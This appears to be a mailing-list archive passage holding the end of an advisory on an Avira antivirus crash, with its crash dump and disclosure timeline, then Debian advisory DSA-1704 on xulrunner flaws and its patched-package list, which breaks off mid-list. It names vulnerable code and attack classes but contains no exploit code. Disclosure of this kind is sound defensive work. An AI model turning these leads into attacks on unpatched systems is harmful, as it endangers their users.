DEFAULT_BUCKET_ID:  INVALID_POINTER_READ

PROCESS_NAME:  avscan.exe
OVERLAPPED_MODULE: Address regions for 'AVREP' and 'rcimage.dll' overlap

READ_ADDRESS:  00000268 
BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_READ_CORRUPT_MODULELIST_OVERLAPPED_MODULE
LAST_CONTROL_TRANSFER:  from 0131cb8c to 0131cad9

STACK_TEXT:  

0194f5fc 0131cb8c 0115bbfc 00000003 00000100 aepack!module_get_api+0x20ed9
0194f618 01319b96 0115bbfc 074cc4f4 00000002 aepack!module_get_api+0x20f8c
0194f654 0131a45a 00000010 01157160 00000001 aepack!module_get_api+0x1df96
0194f668 0131e7e0 000000d4 00f48ba8 011530d0 aepack!module_get_api+0x1e85a
0194f68c 01318c35 01157160 00000010 011530d0 aepack!module_get_api+0x22be0
00000000 00000000 00000000 00000000 00000000 aepack!module_get_api+0x1d035

FOLLOWUP_IP: 
aepack!module_get_api+20ed9
0131cad9 8b10            mov     edx,dword ptr [eax]

SYMBOL_NAME:  aepack!module_get_api+20ed9
MODULE_NAME: aepack
IMAGE_NAME:  aepack.dll
STACK_COMMAND:  ~2s ; kb

FAILURE_BUCKET_ID:  INVALID_POINTER_READ_c0000005_aepack.dll!module_get_api
BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_READ_CORRUPT_MODULELIST_OVERLAPPED_MODULE_aepack!module_get_api+20ed9


IV. Disclosure Timeline
~~~~~~~~~~~~~~~~~~~~~~~~
The    Vulnerability    notification    policy    i    adhere    to:
http://blog.zoller.lu/search/label/Vulnerability%20disclosure%20Policy

 
17/12/2008  :  Sent  notice   to    the    correct    mail    adress
security@avira. com

17/12/2008 : Avira achknowledges receipt 

17/12/2008 : Avira sends details of  the  root  cause  on  the  same
day "The  crash  occurs  in  a  heavily  corrupted,   generated  RAR
archive while extracting the contents of the 22nd  file.   We  can't
give  any  file  names  as  they  are  non-printable  characters.  "

13/01/2009 : Avira notifies me that the  issue  was  fixed  with  an
update that shipped with AVPack 8.1.3.5  on  the  09/01/2009

14/01/2009 : Avira states  that  all  products  have  been  affected
except  "Securityy  Management  Center"  and  the  "Internet  Update
Manager". "Das bedeutet im Prinzip wirklich alle  Produkte,   ausser
Produkte wie eben das Security Management Center oder  der  Internet
Update Manager"

14/01/2009 : Release of this advisory 


Thierry Zoller
http://blog.zoller.lu

From - Wed Jan 14 16:32:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058e7
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39179-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id D4F32EC747
for <lists@securityspace.com>; Wed, 14 Jan 2009 16:30:21 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id EDD39236FD2; Wed, 14 Jan 2009 14:12:55 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 10742 invoked from network); 14 Jan 2009 20:05:38 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <jmm@inutil.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight:  DYN_NJABL=ERR NOT_IN_SBL_XBL_SPAMHAUS=-1.5 NOT_IN_BL_NJABL=-1.5 CL_IP_EQ_FROM_MX=-3.1 <client.151.30.8> <helo=inutil.org> <from=jmm@inutil.org> <tobian-security-announce@lists.debian.org>, rate: -6.1
Date: Wed, 14 Jan 2009 21:28:56 +0100
From: Steffen Joeris <white@debian.org>
Sender: Moritz Muehlenhoff <jmm@debian.org>
Message-ID: <20090114202856.GA14543@galadriel.inutil.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
X-SA-Exim-Connect-IP: 82.83.179.203
X-SA-Exim-Mail-From: jmm@inutil.org
X-SA-Exim-Scanned: No (on inutil.org); SAEximRunCond expanded to false
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-10.58 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_2=1, LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1,
MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1704-1] New xulrunner packages fix several vulnerabilities
Priority: urgent
Resent-Message-ID: <i_SV-9EHewL.A.ZXB.gskbJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Wed, 14 Jan 2009 20:29:20 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1704                    security@debian.org
http://www.debian.org/security/                           Steffen Joeris
January 14, 2009                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : xulrunner
Vulnerability  : several vulnerabilities
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2008-5500 CVE-2008-5503 CVE-2008-5506 CVE-2008-5507 CVE-2008-5508 CVE-2008-5511 CVE-2008-5512

Several remote vulnerabilities have been discovered in Xulrunner, a
runtime environment for XUL applications. The Common Vulnerabilities and
Exposures project identifies the following problems:

CVE-2008-5500

   Jesse Ruderman  discovered that the layout engine is vulnerable to
   DoS attacks that might trigger memory corruption and an integer
   overflow. (MFSA 2008-60)

CVE-2008-5503

   Boris Zbarsky discovered that an information disclosure attack could
   be performed via XBL bindings. (MFSA 2008-61)

CVE-2008-5506

   Marius Schilder discovered that it is possible to obtain sensible
   data via a XMLHttpRequest. (MFSA 2008-64)

CVE-2008-5507

   Chris Evans discovered that it is possible to obtain sensible data
   via a JavaScript URL. (MFSA 2008-65)

CVE-2008-5508

   Chip Salzenberg discovered possible phishing attacks via URLs with
   leading whitespaces or control characters. (MFSA 2008-66)

CVE-2008-5511

   It was discovered that it is possible to perform cross-site scripting
   attacks via an XBL binding to an "unloaded document." (MFSA 2008-68)

CVE-2008-5512

   It was discovered that it is possible to run arbitrary JavaScript
   with chrome privileges via unknown vectors. (MFSA 2008-68)

For the stable distribution (etch) these problems have been fixed in
version 1.8.0.15~pre080614i-0etch1.

For the testing distribution (lenny) and the unstable distribution (sid)
these problems have been fixed in version 1.9.0.5-1.

We recommend that you upgrade your xulrunner packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1.diff.gz
    Size/MD5 checksum:      971 73ec26e81ce6e401845eb070aa26d909
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1.dsc
    Size/MD5 checksum:     1981 87dd485ac774e78373be5a196cbc8320
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i.orig.tar.gz
    Size/MD5 checksum: 43320191 82b3061f947787bf267a36513a6bd2dd

Architecture independent packages:

  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-dev_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:   231436 f692e056f6eccb9633771a1b5d56d115
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul-common_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:  1052120 9935f278d06c5256a1cb6d34f6b43777
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:   176532 03d96486a1cb92ca65b39376add42232
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul-dev_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:  2638014 f4c9fed2489696b18ecedf945729ffa7
  http://security.debian.org/pool/updates/main/x/xulrunner/libsmjs1_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:    37402 033e412379eab51f4608530af659596a
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozillainterfaces-java_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:  1032570 b8277c4699e9f2edc9131c525c72ac2a
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-dev_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:   208008 d6685b7c5a83eb2fc383ad2284e0c300
  http://security.debian.org/pool/updates/main/x/xulrunner/libsmjs-dev_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:    37436 a668ef6417fe2f868964b2e1f1cd9028

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum: 46039574 068112b86f727680427633606c026ee8
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum:   905956 ab2dae7df915ed9df912a45332feda25
  http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum:    53462 1211c97fa83041bfdd3d89c5d0cbe49c
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum:   739356 038af743b90f988367f7cae810adca30
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum:   302966 7cf37ed3bd131afd5d77ac4b6a4a0e80
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum:   293396 ebda2282ee4f81e8e972254522ab98ee
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum:    71512 167d644c17e1fbeb7db1b586e1416516
  http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum:   130252 738d7bacc1f2037e6fd34e094382a414
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum:  7348590 9b48fd7155a90c0d4b42a60b3ca87e21
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum:   162918 b4fb7360352ff7e3d3f4a1e4692f0399
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum:   386930 4b9a91448ef45dc0512a11197b568653
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum:  3189364 8375722343ed726036dafe752298217b
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum:   765528 e30aa7d614c04ed6ba755184d53b0f83

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:   149212 19ab1c22cd55db2bc8ee33be7fff759b
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:   810610 5493e297887f037ed4cdd9c2150e68ed
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:    69626 4825855bdb9b5a8bb2c62436fde8ad7c
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:  6345322 f975d16444059b3b9ae1b43c1a9c0cda
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:   756112 af22a3727a03e9bda037a329ee21df65
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:   305094 4855bb5ffe73a231bb2a0d701616e7eb
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:   279116 b7f981650c4b20db874b70a2bd6bc059
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:   356260 dbec2df715586df57acd7228a3175ef9
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum: 45243162 2aba2e701aac5639822ce0e6ed911948
  http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:    53664 5d946fe8bf84c2e5514f0114ce77ac71
  http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:   126976 76ebe8f1cc4eb9a881fdea16732c2674
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:   671242 269e0391c1bffea6f26c283457fdb5a3
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:  3180000 ba7dcb523f47170cf40f8d07f078ff38

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum: 44767070 ff1a7f0d6d410e514b4fec797c978577
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:   732710 a077246fbfa402b28df5b7c94ca64f03
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:   326560 97d77b72fb59380c6dd65f2464b17748
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:   260802 b517d6273306a6b2620717924d451c1e
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:    63374 14f5f6627a23585127b48559da6e0b3e
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:   291166 727015b23b21585ad8bc15fa0c3c01c4
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:   594490 b3eb4a04bdc1d00d6d735c651de116f9
  http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:    51382 5cbc748af5b9198cb129ce1fafd7a8d0
  http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:   119438 6f3288cc981b5e5799bacf6befa8ce7c
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:   137188 8f3727780153f49902d4dd440f7a48ff
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:   705428 18ee2b57007cf41e8bc2888757c247c9
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:  5371364 d6ad1248c0949aaf3430662fbf367ded
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:  2970288 4b6793a379f21fc5eb06b98bd349a3e2

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum: 46155188 c37a7bf2fe01cb20fbe83b23c22c76c4
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:   161944 c7498923bbb2ac0917b89f5e1bc1335d
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:   302552 64dfa94053b2f5ebeca61307c7c687cf
  http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:   132346 77b099b16d12baab295fbbb44b8e4705
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:   391234 9b574c8782603f7f12caa0c622b79c57
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:  7553990 1ae462d397b8c4de85ed9bb44398fa68
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:   288610 2ee1dd5d5f8b1f2dc2f31f1b47ee0401
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:    71188 f22b185182ded01cad34df565e33fa34
  http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:    53706 4ecb4b3c07ace717767c0ac6ab631816
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:   875004 3841afcdff3a1cf37041560718db619f
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:  3105180 5d9c78af9a11d310200260b1862e1b77
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:   753304 421db187ed2aaa135d7c6d1d72475cc1
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:   704006 10305d20ffbd30ee9a8304b281ed410f

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum: 44716280 14630037caf61026b23b89cd2d7ee906
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:  3033738 a8d8501331ee08577ddc4c6ac79f8c82
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:   337330 52fc267a0badecc2f6ee63fdefbb6b27
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:  5385268 656b0080011c0922718459ae8d57a65f
  http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:   118962 f4dcddae42b65530be240a88a1fb0dce
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:   268382 2a9f3e60120236105c636de6eeec6b16
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:   140106 77d0dc883aca560cddda828961d8eb69
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:    64110 1acc5d5b8309b9ddecb5ee1e5565083b
  http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:    51204 6be1abbf15a3a7bef4972047be976c5d
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:   743240 e9497985c4d89ae570b7a32347002733
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:   715094 2eb3ec027c357d16e522ddfba8a677c6
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:   296684 2c92c0cfc031d09f2b064e9195f6832b
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:   628686 962d21ec6b9ecf88bec3a6e65fc51d5c

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:   287808 d87e43a55b54420373bf40db42e91152
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:   937358 91e2ec2a7b2c406b96a9c912e9e8ca36
  http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:    58184 71a0cd0e35e1743698a3a246f20f4d0a
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:   533280 985c52b70f2dc075da26cea1a97df109
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:  1121834 19c744b9995ccdd855212e4ad6eb07ad
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:   756020 a7cbe4174c6a39f3b8e1365193ed80ef
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:  9685590 763fa7e7d9cf7ad6cc95b2b924a894ce
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:   199030 bab7b1f432fc24acc1ff56857ee18a0f
  http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:   151088 560b8d6be4b0ad31fcc2159ac3d72649
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:   334942 81225ca738fb8f78974f321af108d866
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:  3052352 ab57bb5032c35aa66bdf47e777e72b37
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum: 45460812 9c2a67cf26debcdea09421c2e330b120
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:    81142 2cf21c543bbb34561f6c2828ab7a08d0

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum: 46786690 9ccb2a732e0a2a49d1f1f9d5d68cef86
  http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:   119034 0a10831d2377b7278cfbdb2e90574535
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:  5955860 db51379ca6bba623c738ec7cae30271a
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:   809332 94a939e3ca873e217ef215fce9b63dc1
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:   671304 fd3252bd400f87abc8350617d3a31c25
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:    65610 632f5a86ddeed0e5ff6747189b4d9169
  http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:    52820 b1a2dccc6643955c7763fd2920f22418
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:   274358 10a1723ef97b4c11a3bb081d571e20c6
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:   312858 bf8db163f331cfbc9f1df9982813eab3
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:   786828 9a1b768ccfae0c4dc5688c3362a2d9fc
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:   352918 47b68c4cd5fdb3b5c8b2252e4cec0bd1
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:  3290808 61bae851c0f69a4a8499855db0a2bf44
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:   147064 c220f1717506e0f721b214c23344aae4

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum:   146654 66f51faead5bb8643b378056f7e91200
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum:   351756 cdbd6d5cc056fe7ab22e99c0b4b17303
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum:  5758508 d2a8f3588c96dbd86a313415f942b796
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum:    65448 2e91580fd824a483cf15e41329ee54d6
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum:   670958 9ce924c9c7c373bcb66c3d142598b960
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum:   767374 db65bedd1451e3d002996607504f832c
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum:  3187790 205442831b53abed47347494afd74c13
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum: 45388864 53ba9135abdeb81b127319c2965d654c
  http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614i-0etch1_mipsel.deb
